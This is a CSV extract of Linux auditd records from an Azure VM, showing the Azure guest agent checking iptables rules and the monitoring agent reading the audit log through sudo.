+55,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505682.468:9077977,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1880b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28124', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+56,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505682.468:9077978,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=56090ef1ebb8', 'a1=56090ef1eb70', 'a2=56090ef1eb88', 'a3=7f070efd0810', 'items=2', 'ppid=28124', 'pid=28125', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+57,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505682.472:9077979,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1880b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28126', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+58,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505682.472:9077980,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55668ef877e0', 'a1=55668ef87728', 'a2=55668ef877b0', 'a3=7f1cf8527810', 'items=2', 'ppid=28126', 'pid=28127', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+59,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.308:9077981,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5628ca7c1d78', 'a1=7f28182fad48', 'a2=5628c9e914a0', 'a3=40', 'items=2', 'ppid=1350', 'pid=28129', 'auid=4294967295', 'uid=998', 'gid=999', 'euid=0', 'suid=0', 'fsuid=0', 'egid=999', 'sgid=999', 'fsgid=999', 'tty=(none)', 'ses=4294967295', 'comm=""sudo""', 'exe=""/usr/bin/sudo""', 'key=(null)']}, {'EXECVE': ['argc=6', 'a0=""sudo""', 'a1=""/opt/microsoft/omsagent/ruby/bin/ruby""', 'a2=""/opt/microsoft/omsagent/plugin/tailfilereader.rb""', 'a3=""/var/log/audit/audit.log""', 'a4=""-p""', 'a5=""/var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.AuditLog_CL_52b1ab41-869e-4138-9e40-2a4457f09bf0.pos""']}, {'CWD': ['cwd=""/""']}, {'PATH': ['item=0', 'name=""/usr/bin/sudo""', 'inode=4361', 'dev=08:01', 'mode=0104755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=7375646F002F6F70742F6D6963726F736F66742F6F6D736167656E742F727562792F62696E2F72756279002F6F70742F6D6963726F736F66742F6F6D736167656E742F706C7567696E2F7461696C66696C657265616465722E7262002F7661722F6C6F672F61756469742F61756469742E6C6F67002D70002F7661722F6F7074']}]"
+60,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.320:9077982,"[{'USER_CMD': ['pid=28129', 'uid=998', 'auid=4294967295', 'ses=4294967295', 'msg=\'cwd=""/""', 'cmd=2F6F70742F6D6963726F736F66742F6F6D736167656E742F727562792F62696E2F72756279202F6F70742F6D6963726F736F66742F6F6D736167656E742F706C7567696E2F7461696C66696C657265616465722E7262202F7661722F6C6F672F61756469742F61756469742E6C6F67202D70202F7661722F6F70742F6D6963726F736F66742F6F6D736167656E742F73746174652F435553544F4D5F4C4F475F424C4F422E41756469744C6F675F434C5F35326231616234312D383639652D343133382D396534302D3261343435376630396266302E706F73', 'terminal=?', ""res=success'""]}]"
+61,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.320:9077983,"[{'CRED_REFR': ['pid=28129', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+62,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.320:9077984,"[{'USER_START': ['pid=28129', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:session_open"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+63,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.320:9077985,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5565567f6138', 'a1=5565567ea228', 'a2=5565567e9130', 'a3=0', 'items=2', 'ppid=28129', 'pid=28131', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""ruby""', 'exe=""/opt/microsoft/omsagent/ruby/bin/ruby""', 'key=(null)']}, {'EXECVE': ['argc=5', 'a0=""/opt/microsoft/omsagent/ruby/bin/ruby""', 'a1=""/opt/microsoft/omsagent/plugin/tailfilereader.rb""', 'a2=""/var/log/audit/audit.log""', 'a3=""-p""', 'a4=""/var/opt/microsoft/omsagent/state/CUSTOM_LOG_BLOB.AuditLog_CL_52b1ab41-869e-4138-9e40-2a4457f09bf0.pos""']}, {'CWD': ['cwd=""/""']}, {'PATH': ['item=0', 'name=""/opt/microsoft/omsagent/ruby/bin/ruby""', 'inode=279268', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F6F70742F6D6963726F736F66742F6F6D736167656E742F727562792F62696E2F72756279002F6F70742F6D6963726F736F66742F6F6D736167656E742F706C7567696E2F7461696C66696C657265616465722E7262002F7661722F6C6F672F61756469742F61756469742E6C6F67002D70002F7661722F6F70742F6D696372']}]"
+64,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.388:9077986,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55bcf81e2120', 'a1=55bcf82fb848', 'a2=55bcf832fec0', 'a3=b', 'items=2', 'ppid=28131', 'pid=28133', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sudo""', 'exe=""/usr/bin/sudo""', 'key=(null)']}, {'EXECVE': ['argc=4', 'a0=""sudo""', 'a1=""test""', 'a2=""-f""', 'a3=""/var/log/audit/audit.log""']}, {'CWD': ['cwd=""/""']}, {'PATH': ['item=0', 'name=""/usr/bin/sudo""', 'inode=4361', 'dev=08:01', 'mode=0104755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=7375646F0074657374002D66002F7661722F6C6F672F61756469742F61756469742E6C6F67']}]"
+65,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.396:9077987,"[{'USER_CMD': ['pid=28133', 'uid=0', 'auid=4294967295', 'ses=4294967295', 'msg=\'cwd=""/""', 'cmd=74657374202D66202F7661722F6C6F672F61756469742F61756469742E6C6F67', 'terminal=?', ""res=success'""]}]"
+66,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.396:9077988,"[{'CRED_REFR': ['pid=28133', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+67,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.396:9077989,"[{'USER_START': ['pid=28133', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:session_open"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+68,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.396:9077990,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5621f8659f48', 'a1=5621f8667c18', 'a2=5621f8670390', 'a3=0', 'items=2', 'ppid=28133', 'pid=28134', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""test""', 'exe=""/usr/bin/test""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""test""', 'a1=""-f""', 'a2=""/var/log/audit/audit.log""']}, {'CWD': ['cwd=""/""']}, {'PATH': ['item=0', 'name=""/usr/bin/test""', 'inode=4230', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=74657374002D66002F7661722F6C6F672F61756469742F61756469742E6C6F67']}]"
+69,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.400:9077991,"[{'USER_END': ['pid=28133', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:session_close"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+70,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.400:9077992,"[{'CRED_DISP': ['pid=28133', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+71,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.416:9077993,"[{'USER_END': ['pid=28129', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:session_close"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+72,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.416:9077994,"[{'CRED_DISP': ['pid=28129', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/bin/sudo""', 'hostname=?', 'addr=?', 'terminal=?', ""res=success'""]}]"
+73,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.480:9077995,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1d1fb0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28135', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+74,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.480:9077996,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55c996f35bb8', 'a1=55c996f35b70', 'a2=55c996f35b88', 'a3=7f3460791810', 'items=2', 'ppid=28135', 'pid=28136', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+75,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.484:9077997,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1d1fb0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28137', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+76,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505687.484:9077998,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55855291f7e0', 'a1=55855291f728', 'a2=55855291f7b0', 'a3=7fb898ecd810', 'items=2', 'ppid=28137', 'pid=28138', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+77,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505692.492:9077999,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c2633d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28139', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+78,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505692.492:9078000,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55c4b16b9bb8', 'a1=55c4b16b9b70', 'a2=55c4b16b9b88', 'a3=7f4baf889810', 'items=2', 'ppid=28139', 'pid=28140', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+79,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505692.500:9078001,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c2633d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28141', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
